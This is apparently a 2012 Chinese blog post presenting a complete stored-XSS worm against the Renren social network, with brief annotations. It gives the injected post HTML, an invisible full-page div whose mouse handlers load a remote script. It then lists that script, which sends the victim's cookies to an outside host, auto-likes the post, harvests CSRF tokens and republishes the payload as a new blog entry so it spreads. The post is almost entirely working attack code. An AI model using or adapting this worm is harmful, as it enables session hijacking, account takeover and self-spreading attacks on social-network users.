eemaro

[12.11.22]xss live-code


如上图,日志内容div:

<p>
<img thumbnail="http://fmn.rrimg.com/fmn058/20121121/1750/original_eyyN_312c000026da118f.jpg" title="photo-media" src="http://fmn.rrimg.com/fmn058/20121121/1750/original_eyyN_312c000026da118f.jpg" border="0" />
</p>

<p> I Love You , My Sweetheart</p>

<div style="height:100%; width:100%;z-index:10;position:absolute; left:0px; top:0px;" id="Nietzsche"
onMouseOver = "var script=document.createElement('SCRIPT');
script.setAttribute('type','text/javascript');
script.setAttribute('src','http://webyuming.com//xss-test/renren/test.js');
document.getElementsByTagName('head')[0].appendChild(script);"

onclick="var script=document.createElement('SCRIPT');
script.setAttribute('type','text/javascript');
script.setAttribute('src','http://webyuming.com//xss-test/renren/test.js');
document.getElementsByTagName('head')[0].appendChild(script);"

onmousemove="var script=document.createElement('SCRIPT');
script.setAttribute('type','text/javascript');
script.setAttribute('src','http://webyuming.com//xss-test/renren/test.js');
document.getElementsByTagName('head')[0].appendChild(script);">

<a href="http://rrurl.cn/97w8nT" data-mce-href="http://rrurl.cn/97w8nT.cn/l/asg_video.asp">&nbsp;</a>

</div>

  

webyuming.com//xss-test/renren/test.js脚本中的代码:

/*some userful function*/

在页面中加入jquery。

function include_js(path,reload)

{

var scripts = document.getElementsByTagName("script");

if (!reload)

for (var i=0;i<scripts.length;i++)

if (scripts[i].src && scripts[i].src.toLowerCase() == path.toLowerCase() ) return;

var sobj = document.createElement('script');

sobj.type = "text/javascript";

sobj.src = path;

var headobj = document.getElementsByTagName('head')[0];

headobj.appendChild(sobj);

}

加入jQuery

include_js("http://code.jquery.com/jquery-1.8.2.min.js",0); //JQuery

设置cookie

function setCookie(name,value)

{

var Days = 30;

var exp = new Date();

exp.setTime(exp.getTime() + Days*24*60*60*1000);

document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString();

}

//read cookies

读取cookie

function getCookie(name)

{

var arr;

var reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");

if(arr=document.cookie.match(reg)) return unescape(arr[2]);

else return null;

}

下面的函数里就是发布的“日志”的内容了。

function return_code()

{//return my code

var my_code="<p><img thumbnail=\"http://fmn.rrimg.com/fmn058/20121121/1750/original_eyyN_312c000026da118f.jpg\" title=\"photo-media\" src=\"http://fmn.rrimg.com/fmn058/20121121/1750/original_eyyN_312c000026da118f.jpg\" border=\"0\" /></p><p> I Love You , My Sweetheart</p><div style=\"height:100%; width:100%;z-index:10;position:absolute; left:0px; top:0px;\" id=\"Nietzsche\" onMouseOver=\"var script=document.createElement(\'SCRIPT\');script.setAttribute(\'type\',\'text/javascript\');script.setAttribute(\'src\',\'http://webyuming.com//xss-test/renren/test.js\');document.getElementsByTagName(\'head\')[0].appendChild(script);\" onclick=\"var script=document.createElement(\'SCRIPT\');script.setAttribute(\'type\',\'text/javascript\');script.setAttribute(\'src\',\'http://webyuming.com//xss-test/renren/test.js\');document.getElementsByTagName(\'head\')[0].appendChild(script);\" onmousemove=\"var script=document.createElement(\'SCRIPT\');script.setAttribute(\'type\',\'text/javascript\');script.setAttribute(\'src\',\'http://webyuming.com//xss-test/renren/test.js\');document.getElementsByTagName(\'head\')[0].appendChild(script);\"><a href=\"http://www.baidu.com\" data-mce-href=\"http://www.baidu.com.cn/l/asg_video.asp\"> </a></div>";

return my_code;

}

///////////////////////////////////////////////////////////

清除div

function clear_code()

{

$(function(){

$("#Nietzsche").remove("#Nietzsche");

});

}

获取uid

function get_now_blog_owner_id()

{

var id = "";

var url = location.href;

var id_index = url.indexOf("\/blog\/") + 6;

var id_end = url.indexOf("\/",id_index) - 1;

id = url.substr(id_index,id_end - id_index);

return id;

}

获取blog id

function get_now_blog_id()

{

var id = "";

var userid = get_now_blog_owner_id();

var url = location.href;

//alert(userid);

var id_index = url.indexOf(userid) + userid.length + 2; //because of the '/' so add two

if(url.indexOf("?",id_index) > 0)

{//找到问号

var id_end = url.indexOf("?",id_index);

}

else

{//没有找到问号的话

var id_end = url.length;

}

id = url.substr(id_index,id_end - id_index);

return id;

}

着手发日志的准备工作

//new-blog-token///////

var title = "";

var comment = "";

发日志重要的全局变量

var requestToken = "";

var rtk = "";

var now_blog_owner_id = get_now_blog_owner_id();

var now_blog_id = get_now_blog_id();

送cookie

function send_cookie()

{//send cookie to the server

if(getCookie("JOSSION_DONE") == "1")

{

// clear_code();

return;

}

这个地方就把cookie给人家了。

$.post("http://webyuming.com/xss-test/renren/test.php",{cookie:document.cookie});

setCookie("JOSSION_DONE","1");

//clear_code();

return ;

}

还要点喜欢。。

function set_like()

{//set to like this blog

if(getCookie("JOSSION_S_LIKE_DONE") == "1")

{

// clear_code();

return;

}

var gid = "blog_"+now_blog_id;

var uid = getCookie("id");

var owner = now_blog_owner_id;

var name = unescape("%E9%A9%AC%E5%BD%A7"); //some thing wrong here tmd...

var t = "0.19290689448826015";

$.get("http://like.renren.com/addlike",{gid:gid,uid:uid,t:t,owner:owner,type:0,name:name});

//$.get("http://127.0.0.1/XSS/test.php",{gid:gid,uid:uid,t:t,owner:owner,type:0,name:name});

setCookie("JOSSION_S_LIKE_DONE","1"); //addlike?gid=blog_880089157&uid=488528531&t=0.19290689448826015&owner=406146278&type=0&name=%E9%A9%AC%E5%BD%A7

//addlike?gid=blog_880089157&uid=488528531&t=0.676470594946295&owner=406146278&type=0&name=%E9%A9%AC%E5%BD%A7

}

////////real_add_new_blog

发日志

function new_blog()

{//don't use this function yourself , if the token has find , other function will use this function to add a new blog

if(getCookie("JOSSION_S_BLOG_DONE") == "1")

{

// clear_code();

return;

}

var userid = getCookie("id");

var my_requestToken = requestToken;

发日志的程序在这里

//ADD A NEW BLOG

$.post("http://blog.renren.com/NewEntry.do",{title:title,body:comment,categoryId:0,blogControl:99,passwordProtedted:0,postFormId:my_requestToken,id:userid,relative_optype:"default",jf_vip_em:true,bfrom:010203044,requestToken:my_requestToken,_rtk:rtk,requestToken:my_requestToken,_rtk:rtk,needFeed:true,feedKind:"pic",feedSrc:"http://fmn.rrimg.com/fmn058/20121121/1750/original_eyyN_312c000026da118f.jpg"});

setCookie("JOSSION_S_BLOG_DONE","1"); //set cookie that prove blog has add

}

/////call back

“回调函数”:在得到result后调用的函数。

function get_token_callback(result)

{//callback function

var requestToken_index = 0,rtk_index = 0,requestToken_end = 0,rtk_end = 0;

requestToken_index = result.indexOf("get_check:\'");

rtk_index = result.indexOf("get_check_x:\'");

requestToken_index += 11;

rtk_index += 13;

requestToken_end = result.indexOf("\'",requestToken_index);

rtk_end = result.indexOf("\'",rtk_index);

requestToken = result.substr(requestToken_index,requestToken_end - requestToken_index);

rtk = result.substr(rtk_index,rtk_end - rtk_index);

//if get the token then new blog

if(requestToken != "")

{

new_blog();

}

return;

}

封装好的发日志函数。

function add_a_new_blog(my_title,my_comment)

{

title = my_title;

comment = my_comment;

if(getCookie("JOSSION_S_BLOG_DONE") == "1")

{

// clear_code();

return;

}

var userid = getCookie("id");

//ADD A NEW BLOG

给http://blog.renren.com/NewEntry.do发个请求得到响应result,从回调函数get_token_callback中获取token信息

$.get("http://blog.renren.com/NewEntry.do",{},get_token_callback); //find token and add a new blog

}

//alert(return_code());

///////////////////////////////

//alert(document.cookie);

////////////////////////////////

/* main function */

clear_code(); //恢复被劫持的页面

送cookie

send_cookie();

点喜欢

set_like();//set to like this blog

发日志

add_a_new_blog("我爱你。亲爱的。。。",return_code()); //add a new blog

 

 

 

 

posted on 2012-11-23 01:00  eemaro  阅读(6164)  评论(1)    收藏  举报